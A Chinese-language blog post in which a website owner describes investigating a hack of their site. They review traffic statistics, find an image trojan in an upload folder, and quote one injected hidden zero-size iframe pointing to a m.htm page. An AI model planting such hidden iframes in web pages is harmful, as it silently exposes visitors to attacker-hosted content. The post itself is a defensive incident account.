这篇教程技术含量不是很多主要还是想和大家说下被攻击后的处理方案,遇到我这样的情况不要心急,慢慢的查询黑客的蛛丝马迹就能懂得它的攻击方法做出很好的防范和防御。
另外请大家见谅,我已经把我的主思路录了下来,另外很多方面涉及到了该黑客的资料,在这里我已经保留,所以录像是有断续,谢谢大家。
证据。(http://www.kcvg.cn)
今天我站打开,发现被人攻击了,现在我就要找到这个黑客的蛛丝马迹。。。
其实做黑客要有道德。骂人就不好了。。
开始找它。
我站申请了来路统计,到那里去看看。
干脆恢复部分信息。
找到相关的时段分析,因为在攻击后,首页的集束系统就会没有,所以在时段分析,查看最后的访问时段,就能发现相关的信息。
是在2:00-3:00 段没有统计的。
然后我们在连接FTP去看看,它用了什么手段。upFiles 文件夹可以上载文件,然后被我发现 在images 子文件夹中有个Thumbs.db 图片马? 怎么删除了,? 根据这个可以判断,数据库也动了,。。 另外也可以推出,应该它的手段是全站文本文件全挂马? 呵呵中了。。 下载回来,看是不是有马。
看来我恢复的希望没有了。 看看其他文件是不是挂马?
呵呵,看上去是个很强的黑客。挂马
<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>?
127.0.0.1? 傻蛋,你还以为这是本机测试啊。
附白哥的话:
我没有得罪你,你攻击我的个人博客有意思吗?中国的确有一批技术相当优秀专业网络安全人员,但你不能采取极端手段让人家变黑吧?
另外,你上网IP以及地址位置我都通过当地电信部门查询了。也在网络110有报案,也许你没发现,在我站最底下有几个字“我站法律顾问刘维”现在我保留……